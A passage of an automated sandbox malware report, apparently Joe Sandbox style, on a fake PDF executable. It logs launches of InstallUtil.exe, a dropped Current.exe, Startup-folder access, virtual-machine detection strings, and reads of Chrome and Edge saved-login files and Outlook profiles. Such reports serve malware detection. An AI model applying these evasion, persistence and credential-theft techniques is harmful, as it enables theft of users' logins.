                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7060 Thread sleep count: 1227 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594718s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99891Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99547Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99438Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99313Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99188Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99063Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98909Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98740Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98568Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98391Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98190Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98053Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97938Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97719Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97375Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97266Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97156Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97047Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96938Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96813Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96703Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96591Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96484Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96375Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96266Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96141Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599014Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595952Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595839Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595731Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99750Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99640Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99422Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99312Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99203Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98981Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98721Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98219Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97479Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97359Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97250Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97140Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97031Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96812Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96703Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96265Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96151Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96011Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596466Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: wscript.exe, 00000004.00000002.2207058200.00000208BC755000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                Source: wscript.exe, 00000004.00000002.2207058200.00000208BC755000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\/l
                Source: Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                Source: File07098.PDF.exe, 00000000.00000002.2089546543.0000000003476000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2094031243.0000000005D00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: jHgFs&7^{
                Source: File07098.PDF.exe, 00000000.00000002.2077497584.0000000000632000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4480522226.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2262355304.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: InstallUtil.exe, 00000006.00000002.4480573279.000000000068C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F57B70 LdrInitializeThunk,6_2_05F57B70
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Current.exe "C:\Users\user\AppData\Roaming\Current.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeQueries volume information: C:\Users\user\Desktop\File07098.PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Current.exe | Queries volume information: C:\Users\user\AppData\Roaming\Current.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Current.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Current.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\File07098.PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6204, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                Source: Yara match | File source: 0.2.File07098.PDF.exe.33f9170.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Current.exe.3ae9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.File07098.PDF.exe.33f9170.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Current.exe.3ae9550.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
